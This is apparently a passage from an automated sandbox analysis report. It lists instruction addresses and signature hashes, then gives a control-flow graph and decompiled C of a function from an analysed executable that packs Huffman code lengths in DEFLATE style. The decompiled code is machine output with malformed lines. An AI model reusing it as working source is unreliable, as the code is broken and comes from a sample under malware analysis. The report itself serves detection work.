                  0x00405591
                  0x00405593
                  0x00405596
                  0x00405599
                  0x0040559c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004055a2
                  0x00405549
                  0x0040554a
                  0x0040554d
                  0x0040555c
                  0x00405567
                  0x00405568
                  0x0040556b
                  0x0040556e
                  0x00405570
                  0x00000000
                  0x00000000
                  0x00405572
                  0x00405576
                  0x00405578
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405578
                  0x00000000
                  0x0040554d
                  0x00405508
                  0x0040550b
                  0x0040550d
                  0x00000000
                  0x00000000
                  0x0040550f
                  0x00405511
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405511
                  0x004053bc
                  0x004053bd
                  0x004053c0
                  0x00000000
                  0x00000000
                  0x004053c6
                  0x004053c9
                  0x004053f4
                  0x004053cb
                  0x004053e1
                  0x004053e6
                  0x004053e9
                  0x004053ec
                  0x004053ef
                  0x004053ef
                  0x004053fc
                  0x00405404
                  0x00405407
                  0x00405409
                  0x00405414
                  0x00405415
                  0x00405418
                  0x00405420
                  0x00405423
                  0x00405424
                  0x0040542c
                  0x0040542f
                  0x0040542f
                  0x00000000
                  0x0040540b
                  0x0040540d
                  0x00405433
                  0x00405433
                  0x00405436
                  0x00405438
                  0x0040543d
                  0x00000000
                  0x00000000
                  0x00405443
                  0x00405446
                  0x00405471
                  0x00405448
                  0x0040545e
                  0x00405463
                  0x00405466
                  0x00405469
                  0x0040546c
                  0x0040546c
                  0x00405479
                  0x00405481
                  0x00405484
                  0x00405486
                  0x00405491
                  0x00405492
                  0x00405495
                  0x004054a2
                  0x004054a7
                  0x004054a8
                  0x004054ab
                  0x004054b3
                  0x004054b6
                  0x004054b6
                  0x00000000
                  0x00405488
                  0x0040548a
                  0x004054ba
                  0x004054bd
                  0x004054bf
                  0x004054c7
                  0x004054c9
                  0x004054ca
                  0x004054cf
                  0x0040561e
                  0x0040561e
                  0x0040561e
                  0x00000000
                  0x0040561e
                  0x004054d5
                  0x004054d8
                  0x004054db
                  0x00000000
                  0x004054db
                  0x00405486
                  0x00405409
                  0x00404f75
                  0x00404f7f
                  0x00404f95
                  0x00404fab
                  0x00404fb1
                  0x00404fb4
                  0x00404fb6
                  0x00404fb9
                  0x00404fbd
                  0x00404fd7
                  0x00404fd7
                  0x00404fdb
                  0x00404fdd
                  0x00404fe3
                  0x00404fe3
                  0x00404fe3
                  0x00404feb
                  0x00404fec
                  0x00404fec
                  0x00404ff5
                  0x00404ff8
                  0x00404ffa
                  0x00405001
                  0x00405004
                  0x00405004
                  0x00405009
                  0x0040500f
                  0x0040501d
                  0x0040501d
                  0x00405020
                  0x00405024
                  0x00405027
                  0x0040502c
                  0x0040516a
                  0x0040516a
                  0x0040516e
                  0x0040539b
                  0x0040539b
                  0x00000000
                  0x0040539b
                  0x00405174
                  0x00405174
                  0x00405176
                  0x0040517c
                  0x0040517f
                  0x00405181
                  0x00405361
                  0x00405363
                  0x00405ad2
                  0x00405ad5
                  0x00405ad5
                  0x00405ad8
                  0x00000000
                  0x00405ad8
                  0x00405377
                  0x00405388
                  0x00405388
                  0x00405392
                  0x00405398
                  0x00000000
                  0x00405398
                  0x00405187
                  0x0040518a
                  0x0040518d
                  0x004051bf
                  0x004051bf
                  0x004051c2
                  0x004051c9
                  0x004051d1
                  0x004051d4
                  0x004051d6
                  0x00405283
                  0x00405284
                  0x00405287
                  0x0040528f
                  0x00405292
                  0x00405293
                  0x0040529b
                  0x0040529e
                  0x0040529e
                  0x004052a2
                  0x004052a5
                  0x004052a7
                  0x004052a9
                  0x004052ac
                  0x004052af
                  0x004052b2
                  0x004052b5
                  0x004052ca
                  0x004052d6
                  0x004052d6
                  0x004052dd
                  0x004052e0
                  0x004052e2
                  0x00405308
                  0x0040530b
                  0x00405310
                  0x00405317
                  0x0040531a
                  0x0040531d
                  0x00405324
                  0x00405326
                  0x00405329
                  0x0040532c
                  0x0040532f
                  0x0040533b
                  0x0040533b
                  0x00405331
                  0x00405331
                  0x00405331
                  0x00405347
                  0x00405350
                  0x00405353
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004052e4
                  0x004052e4
                  0x004052e4
                  0x004052e7
                  0x00000000
                  0x00000000
                  0x004052f2
                  0x004052f4
                  0x004052f5
                  0x004052f8
                  0x004052fb
                  0x004052fe
                  0x00405301
                  0x00405303
                  0x00000000
                  0x00000000
                  0x00405305
                  0x00000000
                  0x00405305
                  0x00405ac7
                  0x00000000
                  0x00405ac7
                  0x004052cc
                  0x004052d0
                  0x00405ab9
                  0x00405ab9
                  0x00405abc
                  0x00000000
                  0x00405abc
                  0x00000000
                  0x004052d0
                  0x004052b7
                  0x004052bd
                  0x004052c4
                  0x00000000
                  0x004052c4
                  0x004051de
                  0x004051e6
                  0x00000000
                  0x004051e6
                  0x00405194
                  0x00405197
                  0x0040526b
                  0x00405270
                  0x00405273
                  0x00405276
                  0x00405279
                  0x00000000
                  0x00405279
                  0x0040519d
                  0x004051a5
                  0x004051ad
                  0x004051b0
                  0x004051b2
                  0x004051ee
                  0x004051f1
                  0x00405226
                  0x00405226
                  0x00405229
                  0x00405aae
                  0x00000000
                  0x00405aae
                  0x00405234
                  0x00405236
                  0x0040523a
                  0x0040523d
                  0x0040523f
                  0x00405242
                  0x00405245
                  0x00405248
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040524e
                  0x004051f5
                  0x004051f6
                  0x004051f9
                  0x00405208
                  0x00405213
                  0x00405214
                  0x00405217
                  0x0040521a
                  0x0040521c
                  0x00000000
                  0x00000000
                  0x0040521e
                  0x00405222
                  0x00405224
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405224
                  0x00000000
                  0x004051f9
                  0x004051b4
                  0x004051b7
                  0x004051b9
                  0x00000000
                  0x00000000
                  0x004051bb
                  0x004051bd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004051bd
                  0x00405032
                  0x00405035
                  0x00405038
                  0x0040503a
                  0x0040503e
                  0x00405041
                  0x00405043
                  0x00000000
                  0x00000000
                  0x00405049
                  0x00405050
                  0x00405056
                  0x0040505d
                  0x00405067
                  0x00405069
                  0x0040506b
                  0x0040506c
                  0x0040506f
                  0x0040506f
                  0x00405073
                  0x00405076
                  0x00405079
                  0x004050c6
                  0x004050cb
                  0x004050d3
                  0x004050d6
                  0x004050d8
                  0x004050dd
                  0x004050e0
                  0x004050e3
                  0x004050eb
                  0x004050eb
                  0x004050ee
                  0x004050f1
                  0x004050f1
                  0x004050f4
                  0x004050f7
                  0x004050fa
                  0x00405143
                  0x0040514b
                  0x0040514b
                  0x0040514e
                  0x00000000
                  0x004050fc
                  0x004050fc
                  0x004050ff
                  0x004050ff
                  0x00405102
                  0x00405105
                  0x00405105
                  0x00405112
                  0x00405117
                  0x0040511b
                  0x0040511e
                  0x00405137
                  0x00405120
                  0x00405123
                  0x00405126
                  0x0040512c
                  0x00405132
                  0x00405132
                  0x0040513a
                  0x0040513a
                  0x0040513a
                  0x0040513d
                  0x00405140
                  0x00000000
                  0x00405140
                  0x004050fa
                  0x00405085
                  0x00405088
                  0x0040508e
                  0x00000000
                  0x00000000
                  0x0040509a
                  0x0040509d
                  0x004050a2
                  0x004050a2
                  0x004050a7
                  0x004050aa
                  0x004050aa
                  0x004050ad
                  0x004050af
                  0x004050b1
                  0x004050b1
                  0x004050b9
                  0x00405156
                  0x00405156
                  0x00405159
                  0x0040515a
                  0x0040515a
                  0x00405164
                  0x00405167
                  0x00405167
                  0x00000000
                  0x00405167
                  0x00405014
                  0x00405017
                  0x00405a9d
                  0x00405aa0
                  0x00405aa0
                  0x00405aa3
                  0x00000000
                  0x00405aa3
                  0x00000000
                  0x00405017
                  0x00404fbf
                  0x00404fc2
                  0x00404fc6
                  0x00404fcd
                  0x00404fce
                  0x00404fce
                  0x00404fd4
                  0x00404fd4
                  0x00000000
                  0x00404fd4
                  0x00404e9e
                  0x00404ea1
                  0x00404ecb
                  0x00404ecb
                  0x00404ed4
                  0x00404ed7
                  0x00404eda
                  0x00404edd
                  0x00404ee0
                  0x00404ee3
                  0x00404eed
                  0x00000000
                  0x00404eed
                  0x00404ea3
                  0x00404ea6
                  0x00404ea6
                  0x00404ea6
                  0x00404ea9
                  0x00000000
                  0x00000000
                  0x00404eb4
                  0x00404eb6
                  0x00404eb7
                  0x00404eba
                  0x00404ebd
                  0x00404ec0
                  0x00404ec3
                  0x00000000
                  0x00000000
                  0x00404ec5
                  0x00404ec8
                  0x00000000
                  0x00404ec8
                  0x00405a92
                  0x00000000
                  0x00405a92
                  0x00404e06
                  0x00404e08
                  0x00404e0b
                  0x00404e14
                  0x00404e1e
                  0x00404e24
                  0x00404e2b
                  0x00404e32
                  0x00404e37
                  0x00404e49
                  0x00404e4a
                  0x00404e4a
                  0x00404e4c
                  0x00404e54
                  0x00404e5a
                  0x00404e60
                  0x00000000
                  0x00404e60
                  0x00404d1e
                  0x00404d1e
                  0x00404d1f
                  0x00000000
                  0x00000000
                  0x00404d26
                  0x00404d26
                  0x00404d27
                  0x00405c30
                  0x00000000
                  0x00405c30
                  0x00404d2d
                  0x00404d2d
                  0x00404d2e
                  0x00405c63
                  0x00000000
                  0x00405c63
                  0x00404d34
                  0x00404d34
                  0x00404d37
                  0x00000000
                  0x00000000
                  0x00404d3d
                  0x00404d3d
                  0x00404d3e
                  0x00405a3f
                  0x00000000
                  0x00405a3f
                  0x00404d44
                  0x00404d45
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404d4b
                  0x00404ccf
                  0x00000000
                  0x00000000
                  0x00404cd5
                  0x00404cd5
                  0x00404cd8
                  0x00000000
                  0x00000000
                  0x00404cde
                  0x00404cde
                  0x00404cdf
                  0x00000000
                  0x00000000
                  0x00404ce5
                  0x00404ce5
                  0x00404ce6
                  0x00000000
                  0x00000000
                  0x00404cec
                  0x00404cec
                  0x00404cef
                  0x00000000
                  0x00000000
                  0x00404cf6
                  0x00404cf6
                  0x00404cf7
                  0x00000000
                  0x00000000
                  0x00404cfd
                  0x00404cfd
                  0x00404cfe
                  0x00000000
                  0x00000000
                  0x00404d04
                  0x00404d05
                  0x00000000
                  0x00000000
                  0x00404d0b
                  0x00404d0b
                  0x00404d0e
                  0x00000000
                  0x00404d0e
                  0x00404b80
                  0x00405604
                  0x00000000
                  0x00405604
                  0x00404b86
                  0x00404b89
                  0x00404c8c
                  0x00404c8c
                  0x00404c8f
                  0x00000000
                  0x00000000
                  0x00404c95
                  0x00404c95
                  0x00404c98
                  0x00000000
                  0x00000000
                  0x00404c9f
                  0x00404c9f
                  0x00404ca0
                  0x00000000
                  0x00000000
                  0x00404ca6
                  0x00404ca6
                  0x00404ca7
                  0x00000000
                  0x00000000
                  0x00404cad
                  0x00404cad
                  0x00404cae
                  0x00000000
                  0x00000000
                  0x00404cb4
                  0x00404cb4
                  0x00404cb7
                  0x00000000
                  0x00000000
                  0x00404cbe
                  0x00404cbf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404cc5
                  0x00404b8f
                  0x00000000
                  0x00000000
                  0x00404b98
                  0x00000000
                  0x00000000
                  0x00404b9e
                  0x00000000
                  0x00404ba5
                  0x00404ba8
                  0x00404baa
                  0x00404bad
                  0x00404baf
                  0x00404bb2
                  0x00404bb5
                  0x00404bb8
                  0x00404bbb
                  0x00404bbe
                  0x00404bc1
                  0x00404bc4
                  0x00404bca
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404bd0
                  0x00404bd0
                  0x00404bd3
                  0x00404bd7
                  0x00404be6
                  0x00404be7
                  0x00000000
                  0x00404be7
                  0x00404bd9
                  0x00404bdc
                  0x00000000
                  0x00000000
                  0x00404bec
                  0x00404bef
                  0x00404bef
                  0x00404bf1
                  0x00404c0a
                  0x00404c0e
                  0x00404c11
                  0x00404c14
                  0x00404c1c
                  0x00404c1f
                  0x00404c24
                  0x00404c2e
                  0x00404c30
                  0x00404c47
                  0x00404c47
                  0x00404c4a
                  0x00404c4c
                  0x00404c4c
                  0x00404c50
                  0x00404c53
                  0x00404c7c
                  0x00404c7c
                  0x00404c7f
                  0x00404c81
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404c87
                  0x00404c5b
                  0x00404c5d
                  0x00404c63
                  0x00404c74
                  0x00404c74
                  0x00404c77
                  0x00404c77
                  0x00404c77
                  0x00404c79
                  0x00000000
                  0x00404c79
                  0x00404c69
                  0x00404c6b
                  0x00404c6c
                  0x00404c6e
                  0x00000000
                  0x00000000
                  0x00404c70
                  0x00000000
                  0x00404c70
                  0x00404c32
                  0x00404c36
                  0x00000000
                  0x00000000
                  0x00404c3c
                  0x00404c3e
                  0x00000000
                  0x00000000
                  0x00404c40
                  0x00404c43
                  0x00000000
                  0x00404c43
                  0x00404bf3
                  0x00404bf5
                  0x00404bf6
                  0x00404bf9
                  0x00404bfb
                  0x00404bfc
                  0x00404c00
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405a5d
                  0x00000000
                  0x00000000
                  0x00404b9e

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$_memset
                  • String ID: $0HCw
                  • API String ID: 805054810-431550929
                  • Opcode ID: 381c95585b6278ef5375f448f3179df0e1c7a5d05708aec7cc4d4f43877259da
                  • Instruction ID: 0f27d5521e96fbc1980188426f25ed571c9babf91149ddb257576a03cfef0b11
                  • Opcode Fuzzy Hash: 381c95585b6278ef5375f448f3179df0e1c7a5d05708aec7cc4d4f43877259da
                  • Instruction Fuzzy Hash: 59D25D71E0461ADBDB18CFA9C9906AEBBB1FF49300F14416AD955F7380D738AA41CF98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00402F82, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 416UNIQUECrypto
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 445 402f82-402fc0 call 402d85 * 2 450 402fc5-402fcd 445->450 451 402fd8-402fdd 450->451 452 402fcf-402fd6 450->452 453 402fde-402fe6 451->453 452->450 452->451 454 402fe8-402fec 453->454 455 402fee-40304a memset 453->455 454->453 454->455 458 403050 455->458 459 4032ae-4032d8 call 402d85 455->459 461 403053-403062 458->461 467 4032f6-40330e 459->467 468 4032da-4032e0 459->468 463 403068-40306d 461->463 464 4030eb-4030f0 461->464 465 4030ba-4030ca 463->465 466 40306f-403072 463->466 469 4030f2-4030f5 464->469 470 403158-40315a 464->470 479 4030d0-4030e6 465->479 480 4031ee-403202 465->480 471 403074-403097 call 40fdd0 466->471 472 403099-4030b2 466->472 477 403310-403316 467->477 478 40332c-403340 467->478 473 4032e2-4032e7 468->473 474 4032ea-4032f4 468->474 481 4030f7-403119 call 40fdd0 469->481 482 40311b-40311e 469->482 475 4031c9-4031d3 470->475 476 40315c-403161 470->476 486 4030b5-4030b7 471->486 472->486 473->474 474->467 474->468 475->480 493 4031d5-4031e8 475->493 484 4031b1-4031c7 476->484 485 403163-403166 476->485 487 403320-40332a 477->487 488 403318-40331d 477->488 490 403342-403348 478->490 491 40335e-403360 478->491 489 4031eb 479->489 480->461 496 403208-40320a 480->496 509 403150-403155 481->509 494 403120-403132 482->494 495 403134-40313e 482->495 484->480 502 403190-4031a9 485->502 503 403168-40318e call 40fdd0 485->503 486->465 487->477 487->478 488->487 489->480 504 403352-40335c 490->504 505 40334a-40334f 490->505 506 403361-403370 491->506 493->489 501 403146-40314d 494->501 495->501 497 403251-403253 496->497 498 40320c-40320f 496->498 497->459 510 403255-403258 497->510 507 403211-403234 call 40fdd0 498->507 508 403236-40324f 498->508 501->509 512 4031ac-4031ae 502->512 503->512 504->490 504->491 505->504 513 403372-403373 506->513 514 403375-403396 506->514 507->459 518 4032ab 508->518 509->470 519 403279-40327c 510->519 520 40325a-403277 call 40fdd0 510->520 512->484 513->506 513->514 515 4033b4-4033bb 514->515 516 403398-40339e 514->516 525 403407-403409 515->525 526 4033bd 515->526 522 4033a0-4033a5 516->522 523 4033a8-4033b2 516->523 518->459 528 403292-40329c 519->528 529 40327e-403290 519->529 520->459 522->523 523->515 523->516 533 4034ac-4034b2 525->533 534 40340f-40343c 525->534 530 4033c0-4033e0 526->530 532 4032a4 528->532 529->532 535 403400-403403 530->535 536 4033e2-4033e8 530->536 532->518 537 40345c-403462 534->537 538 40343e-403444 534->538 535->530 541 403405 535->541 539 4033f2-4033fe 536->539 540 4033ea-4033ef 536->540 544 4034a4-4034a6 537->544 545 403464-403484 537->545 542 403446-40344b 538->542 543 40344e-40345a 538->543 539->535 539->536 540->539 541->525 542->543 543->537 543->538 544->533 544->534 545->544 546 403486-40348c 545->546 547 403496-4034a2 546->547 548 40348e-403493 546->548 547->544 547->546 548->547
                  C-Code - Quality: 88%
                  			E00402F82(void* __ecx) {
				int _v8;
				int _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				char _v356;
				void _v676;
				int _t269;
				signed char _t283;
				signed char _t287;
				signed char _t291;
				signed int _t294;
				signed char _t297;
				signed int _t298;
				signed char _t301;
				signed char _t310;
				int _t336;
				int _t337;
				signed char _t341;
				signed char _t342;
				signed char _t343;
				void* _t344;
				void* _t345;
				signed char _t346;
				signed char _t347;
				signed char _t348;
				signed char* _t349;
				signed char* _t350;
				signed char _t351;
				signed char* _t352;
				signed char* _t353;
				signed char* _t354;
				signed char* _t355;
				signed char* _t356;
				intOrPtr _t358;
				intOrPtr _t360;
				char _t361;
				intOrPtr _t362;
				char _t364;
				intOrPtr _t366;
				intOrPtr _t368;
				void* _t374;
				void* _t375;
				signed int _t377;
				signed char _t379;
				int _t381;
				void* _t383;
				signed int _t385;
				void* _t387;
				void* _t388;
				signed int _t389;
				void* _t390;
				void* _t391;
				void* _t392;
				void* _t393;

				_v20 = 0xff;
				_t383 = __ecx;
				 *((short*)(__ecx + 0x8392)) = 1;
				E00402D85(__ecx, 0, 0x120, 0xf, 0);
				E00402D85(__ecx, 1, 0x20, 0xf, 0);
				_t392 = _t391 + 0x18;
				_t336 = 0x11e;
				while( *((char*)(_t383 + _t336 + 0x8f11)) == 0) {
					_t336 = _t336 - 1;
					if(_t336 > 0x101) {
						continue;
					}
					break;
				}
				_v16 = _t336;
				_t269 = 0x1e;
				while( *((char*)(_t383 + _t269 + 0x9031)) == 0) {
					_t269 = _t269 - 1;
					if(_t269 > 1) {
						continue;
					}
					break;
				}
				_v32 = _t269;
				memcpy( &_v676, _t383 + 0x8f12, _t336);
				memcpy( &_v676 + _t336, _t383 + 0x9032, _v32);
				_t337 = 0;
				_v36 = _v32 + _t336;
				_v12 = 0;
				_v8 = 0;
				memset(_t383 + 0x8612, 0, 0x26);
				_t393 = _t392 + 0x24;
				_v28 = 0;
				if(_v36 > 0) {
					_t310 = _v20;
					do {
						_t379 =  *((intOrPtr*)(_t390 + _v28 - 0x2a0));
						_v24 = _t379;
						if(_t379 != 0) {
							_t358 = _v12;
							if(_t358 != 0) {
								if(_t358 >= 3) {
									if(_t358 > 0xa) {
										 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
										_t364 = _t358 - 0xb;
										 *(_t390 + _t337 - 0x160) = 0x12;
									} else {
										 *((short*)(_t383 + 0x8634)) =  *((short*)(_t383 + 0x8634)) + 1;
										_t364 = _t358 - 3;
										 *(_t390 + _t337 - 0x160) = 0x11;
									}
									 *((char*)(_t390 + _t337 - 0x15f)) = _t364;
									_t337 = _t337 + 2;
								} else {
									 *(_t383 + 0x8612) =  *(_t383 + 0x8612) + _t358;
									E0040FDD0( &_v356 + _t337, 0, _t358);
									_t393 = _t393 + 0xc;
									_t379 = _v24;
									_t337 = _t337 + _v12;
								}
								_t310 = _v20;
								_v12 = 0;
							}
							if(_t379 == _t310) {
								_t381 = _v8 + 1;
								_v8 = _t381;
								if(_t381 == 6) {
									 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
									_t381 = 0;
									 *(_t390 + _t337 - 0x160) = 0x310;
									_v8 = 0;
									goto L33;
								}
							} else {
								_t362 = _v8;
								if(_t362 != 0) {
									if(_t362 >= 3) {
										 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
										 *(_t390 + _t337 - 0x160) = 0x10;
										 *((char*)(_t390 + _t337 - 0x15f)) = _t362 - 3;
										_t337 = _t337 + 2;
									} else {
										 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t362;
										E0040FDD0( &_v356 + _t337, _v20, _t362);
										_t379 = _v24;
										_t393 = _t393 + 0xc;
										_t337 = _t337 + _v8;
									}
									_v8 = 0;
								}
								 *(_t390 + _t337 - 0x160) = _t379;
								_t381 = _v8;
								 *((short*)(_t383 + 0x8612 + (_t379 & 0x000000ff) * 2)) =  *((short*)(_t383 + 0x8612 + (_t379 & 0x000000ff) * 2)) + 1;
								_t337 = _t337 + 1;
							}
						} else {
							_t366 = _v8;
							if(_t366 != 0) {
								if(_t366 >= 3) {
									 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
									 *(_t390 + _t337 - 0x160) = 0x10;
									 *((char*)(_t390 + _t337 - 0x15f)) = _t366 - 3;
									_t337 = _t337 + 2;
								} else {
									 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t366;
									E0040FDD0( &_v356 + _t337, _v20, _t366);
									_t393 = _t393 + 0xc;
									_t337 = _t337 + _v8;
								}
								_v8 = 0;
							}
							_t381 = _v8;
							_t368 = _v12 + 1;
							_v12 = _t368;
							if(_t368 == 0x8a) {
								 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
								 *(_t390 + _t337 - 0x160) = 0x7f12;
								_v12 = 0;
								L33:
								_t337 = _t337 + 2;
							}
						}
						_v28 = _v28 + 1;
						_t310 = _v24;
						_t360 = _v12;
						_v20 = _t310;
					} while (_v28 < _v36);
					if(_t381 == 0) {
						if(_t360 != 0) {
							if(_t360 >= 3) {
								if(_t360 > 0xa) {
									 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
									_t361 = _t360 - 0xb;
									 *(_t390 + _t337 - 0x160) = 0x12;
								} else {
									 *((short*)(_t383 + 0x8634)) =  *((short*)(_t383 + 0x8634)) + 1;
									_t361 = _t360 - 3;
									 *(_t390 + _t337 - 0x160) = 0x11;
								}
								 *((char*)(_t390 + _t337 - 0x15f)) = _t361;
								goto L46;
							} else {
								 *(_t383 + 0x8612) =  *(_t383 + 0x8612) + _t360;
								E0040FDD0( &_v356 + _t337, 0, _t360);
								_t393 = _t393 + 0xc;
								_t337 = _t337 + _v12;
							}
						}
					} else {
						if(_t381 >= 3) {
							 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
							 *(_t390 + _t337 - 0x160) = 0x10;
							 *((char*)(_t390 + _t337 - 0x15f)) = _t381 - 3;
							L46:
							_t337 = _t337 + 2;
						} else {
							 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t381;
							E0040FDD0( &_v356 + _t337, _v24, _t381);
							_t393 = _t393 + 0xc;
							_t337 = _t337 + _v8;
						}
					}
				}
				_push(0);
				_push(7);
				_push(0x13);
				_t385 = 2;
				E00402D85(_t383, _t385);
				_t341 =  *(_t383 + 0x44);
				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t385 << _t341;
				_t387 = 0xfffffff8;
				_t283 = _t341 + 2;
				_t374 = 8;
				 *(_t383 + 0x44) = _t283;
				if(_t283 >= _t374) {
					do {
						_t356 =  *(_t383 + 0x30);
						if(_t356 <  *((intOrPtr*)(_t383 + 0x34))) {
							 *_t356 =  *(_t383 + 0x48);
							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
						}
						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
					} while ( *(_t383 + 0x44) >= _t374);
				}
				_t342 =  *(_t383 + 0x44);
				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _v16 + 0xfffffeff << _t342;
				_t287 = _t342 + 5;
				 *(_t383 + 0x44) = _t287;
				if(_t287 >= _t374) {
					do {
						_t355 =  *(_t383 + 0x30);
						if(_t355 <  *((intOrPtr*)(_t383 + 0x34))) {
							 *_t355 =  *(_t383 + 0x48);
							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
						}
						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
					} while ( *(_t383 + 0x44) >= _t374);
				}
				_t343 =  *(_t383 + 0x44);
				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _v32 - 0x00000001 << _t343;
				_t291 = _t343 + 5;
				 *(_t383 + 0x44) = _t291;
				if(_t291 >= _t374) {
					do {
						_t354 =  *(_t383 + 0x30);
						if(_t354 <  *((intOrPtr*)(_t383 + 0x34))) {
							 *_t354 =  *(_t383 + 0x48);
							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
						}
						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
					} while ( *(_t383 + 0x44) >= _t374);
				}
				_t344 = 0x12;
				while(1) {
					_t186 = _t344 + 0x4111a0; // 0xf
					if( *((char*)(( *_t186 & 0x000000ff) + _t383 + 0x9152)) != 0) {
						break;
					}
					_t344 = _t344 - 1;
					if(_t344 >= 0) {
						continue;
					}
					break;
				}
				_t189 = _t344 + 1; // 0x12
				_t345 = 4;
				_t294 =  <  ? _t345 : _t189;
				_t346 =  *(_t383 + 0x44);
				_v16 = _t294;
				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t294 + 0xfffffffc << _t346;
				_t297 = _t346 + 4;
				 *(_t383 + 0x44) = _t297;
				if(_t297 >= _t374) {
					do {
						_t353 =  *(_t383 + 0x30);
						if(_t353 <  *((intOrPtr*)(_t383 + 0x34))) {
							_t297 =  *(_t383 + 0x48);
							 *_t353 = _t297;
							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
						}
						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
					} while ( *(_t383 + 0x44) >= _t374);
				}
				_t388 = 0;
				_t375 = 0;
				if(_v16 > 0) {
					_t389 = _v16;
					do {
						_t208 = _t375 + 0x4111a0; // 0x121110
						_t351 =  *(_t383 + 0x44);
						 *(_t383 + 0x48) =  *(_t383 + 0x48) | ( *(( *_t208 & 0x000000ff) + _t383 + 0x9152) & 0x000000ff) << _t351;
						_t297 = _t351 + 3;
						 *(_t383 + 0x44) = _t297;
						if(_t297 >= 8) {
							do {
								_t352 =  *(_t383 + 0x30);
								if(_t352 <  *((intOrPtr*)(_t383 + 0x34))) {
									_t297 =  *(_t383 + 0x48);
									 *_t352 = _t297;
									 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
								}
								 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
								 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
							} while ( *(_t383 + 0x44) >= 8);
						}
						_t375 = _t375 + 1;
					} while (_t375 < _t389);
					_t388 = 0;
				}
				if(_t337 != 0) {
					do {
						_t298 =  *(_t390 + _t388 - 0x160) & 0x000000ff;
						_t388 = _t388 + 1;
						_t347 =  *(_t383 + 0x44);
						_v16 = _t298;
						 *(_t383 + 0x48) =  *(_t383 + 0x48) | ( *(_t383 + 0x8cd2 + _t298 * 2) & 0x0000ffff) << _t347;
						_t301 = _t347 + ( *(_t383 + _t298 + 0x9152) & 0x000000ff);
						 *(_t383 + 0x44) = _t301;
						if(_t301 >= 8) {
							do {
								_t350 =  *(_t383 + 0x30);
								if(_t350 <  *((intOrPtr*)(_t383 + 0x34))) {
									 *_t350 =  *(_t383 + 0x48);
									 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
								}
								 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
								 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
							} while ( *(_t383 + 0x44) >= 8);
						}
						_t297 = _v16;
						if(_t297 >= 0x10) {
							_t377 =  *(_t390 + _t388 - 0x160) & 0x000000ff;
							_t388 = _t388 + 1;
							_t348 =  *(_t383 + 0x44);
							_t297 = ( &__imp__IsProcessorFeaturePresent)[_t297] + _t348;
							 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t377 << _t348;
							 *(_t383 + 0x44) = _t297;
							if(_t297 >= 8) {
								do {
									_t349 =  *(_t383 + 0x30);
									if(_t349 <  *((intOrPtr*)(_t383 + 0x34))) {
										_t297 =  *(_t383 + 0x48);
										 *_t349 = _t297;
										 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
									}
									 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
